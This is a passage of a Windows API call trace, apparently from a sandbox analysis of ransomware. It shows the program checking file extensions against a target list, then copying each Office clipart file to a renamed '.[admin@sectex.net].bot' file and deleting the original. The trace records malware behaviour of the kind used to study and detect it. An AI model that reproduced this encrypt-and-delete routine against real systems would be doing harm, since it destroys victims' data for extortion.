	[0150.146] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3760, lpOverlapped=0x0) returned 1
	[0150.147] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.147] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.147] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.147] CloseHandle (hObject=0x3ec) returned 1
	[0150.147] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.147] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.150] CloseHandle (hObject=0x3f0) returned 1
	[0150.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.150] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf")) returned 1
	[0150.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.151] lstrlenW (lpString=".doc") returned 4
	[0150.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString=".docx") returned 5
	[0150.151] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0150.151] lstrlenW (lpString=".pdf") returned 4
	[0150.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString=".xls") returned 4
	[0150.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.151] lstrlenW (lpString=".xlsx") returned 5
	[0150.151] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0150.151] lstrlenW (lpString=".ppt") returned 4
	[0150.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.151] lstrlenW (lpString=".zip") returned 4
	[0150.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.151] lstrlenW (lpString=".rar") returned 4
	[0150.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString=".bz2") returned 4
	[0150.151] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString=".7z") returned 3
	[0150.151] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.151] lstrlenW (lpString=".dbf") returned 4
	[0150.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.151] lstrlenW (lpString=".1cd") returned 4
	[0150.152] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.152] lstrlenW (lpString=".jpg") returned 4
	[0150.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.152] lstrlenW (lpString=".doc") returned 4
	[0150.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString=".docx") returned 5
	[0150.152] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0150.152] lstrlenW (lpString=".pdf") returned 4
	[0150.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString=".xls") returned 4
	[0150.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.152] lstrlenW (lpString=".xlsx") returned 5
	[0150.152] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0150.152] lstrlenW (lpString=".ppt") returned 4
	[0150.152] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.152] lstrlenW (lpString=".zip") returned 4
	[0150.152] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.152] lstrlenW (lpString=".rar") returned 4
	[0150.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString=".bz2") returned 4
	[0150.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString=".7z") returned 3
	[0150.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.152] lstrlenW (lpString=".dbf") returned 4
	[0150.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.153] lstrlenW (lpString=".1cd") returned 4
	[0150.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63
	[0150.153] lstrlenW (lpString=".jpg") returned 4
	[0150.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.153] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.153] lstrlenW (lpString="J0089945.WMF") returned 12
	[0150.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.153] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=19898) returned 1
	[0150.153] CloseHandle (hObject=0x3f0) returned 1
	[0150.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf")) returned 0x20
	[0150.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.154] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.154] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.154] GetLastError () returned 0x0
	[0150.155] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4dba, lpOverlapped=0x0) returned 1
	[0150.156] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4dc0, lpOverlapped=0x0) returned 1
	[0150.158] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.158] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.158] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.158] CloseHandle (hObject=0x3ec) returned 1
	[0150.158] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.158] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.161] CloseHandle (hObject=0x3f0) returned 1
	[0150.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.161] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf")) returned 1
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString=".doc") returned 4
	[0150.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString=".docx") returned 5
	[0150.162] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0150.162] lstrlenW (lpString=".pdf") returned 4
	[0150.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString=".xls") returned 4
	[0150.162] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.162] lstrlenW (lpString=".xlsx") returned 5
	[0150.162] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0150.162] lstrlenW (lpString=".ppt") returned 4
	[0150.162] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString=".zip") returned 4
	[0150.162] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.162] lstrlenW (lpString=".rar") returned 4
	[0150.162] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString=".bz2") returned 4
	[0150.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString=".7z") returned 3
	[0150.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString=".dbf") returned 4
	[0150.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString=".1cd") returned 4
	[0150.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.162] lstrlenW (lpString=".jpg") returned 4
	[0150.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.163] lstrlenW (lpString=".doc") returned 4
	[0150.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString=".docx") returned 5
	[0150.163] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0150.163] lstrlenW (lpString=".pdf") returned 4
	[0150.163] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString=".xls") returned 4
	[0150.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.163] lstrlenW (lpString=".xlsx") returned 5
	[0150.163] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0150.163] lstrlenW (lpString=".ppt") returned 4
	[0150.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.163] lstrlenW (lpString=".zip") returned 4
	[0150.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.163] lstrlenW (lpString=".rar") returned 4
	[0150.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString=".bz2") returned 4
	[0150.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString=".7z") returned 3
	[0150.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.163] lstrlenW (lpString=".dbf") returned 4
	[0150.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.163] lstrlenW (lpString=".1cd") returned 4
	[0150.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned 63
	[0150.164] lstrlenW (lpString=".jpg") returned 4
	[0150.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.164] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.164] lstrlenW (lpString="J0089992.WMF") returned 12
	[0150.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.164] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=15680) returned 1
	[0150.164] CloseHandle (hObject=0x3f0) returned 1
	[0150.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf")) returned 0x20
	[0150.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0150.165] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.165] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0150.165] GetLastError () returned 0x0
	[0150.165] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3d40, lpOverlapped=0x0) returned 1
	[0150.170] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3d50, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3d50, lpOverlapped=0x0) returned 1
	[0150.172] ReadFile (in: hFile=0x3f0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.172] WriteFile (in: hFile=0x3ec, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.172] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.172] CloseHandle (hObject=0x3ec) returned 1
	[0150.172] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.172] SetEndOfFile (hFile=0x3f0) returned 1
	[0150.271] CloseHandle (hObject=0x3f0) returned 1
	[0150.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.301] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf")) returned 1
	[0150.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.312] lstrlenW (lpString=".doc") returned 4
	[0150.312] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.313] lstrlenW (lpString=".docx") returned 5
	[0150.313] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0150.313] lstrlenW (lpString=".pdf") returned 4
	[0150.313] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.313] lstrlenW (lpString=".xls") returned 4
	[0150.313] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.313] lstrlenW (lpString=".xlsx") returned 5
	[0150.313] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0150.313] lstrlenW (lpString=".ppt") returned 4
	[0150.313] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.313] lstrlenW (lpString=".zip") returned 4
	[0150.313] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.313] lstrlenW (lpString=".rar") returned 4
	[0150.313] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.313] lstrlenW (lpString=".bz2") returned 4
	[0150.313] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.313] lstrlenW (lpString=".7z") returned 3
	[0150.313] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.313] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.314] lstrlenW (lpString=".dbf") returned 4
	[0150.314] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.314] lstrlenW (lpString=".1cd") returned 4
	[0150.314] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.314] lstrlenW (lpString=".jpg") returned 4
	[0150.314] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.476] lstrlenW (lpString=".doc") returned 4
	[0150.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.476] lstrlenW (lpString=".docx") returned 5
	[0150.476] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0150.477] lstrlenW (lpString=".pdf") returned 4
	[0150.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString=".xls") returned 4
	[0150.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.477] lstrlenW (lpString=".xlsx") returned 5
	[0150.477] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0150.477] lstrlenW (lpString=".ppt") returned 4
	[0150.477] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.477] lstrlenW (lpString=".zip") returned 4
	[0150.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.477] lstrlenW (lpString=".rar") returned 4
	[0150.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString=".bz2") returned 4
	[0150.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString=".7z") returned 3
	[0150.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.477] lstrlenW (lpString=".dbf") returned 4
	[0150.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.477] lstrlenW (lpString=".1cd") returned 4
	[0150.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned 63
	[0150.477] lstrlenW (lpString=".jpg") returned 4
	[0150.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.477] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.478] lstrlenW (lpString="J0090783.WMF") returned 12
	[0150.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.540] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=6934) returned 1
	[0150.540] CloseHandle (hObject=0x3d0) returned 1
	[0150.540] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf")) returned 0x20
	[0150.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.861] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.861] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0150.863] GetLastError () returned 0x0
	[0150.863] ReadFile (in: hFile=0x1b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1b16, lpOverlapped=0x0) returned 1
	[0150.889] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1b20, lpOverlapped=0x0) returned 1
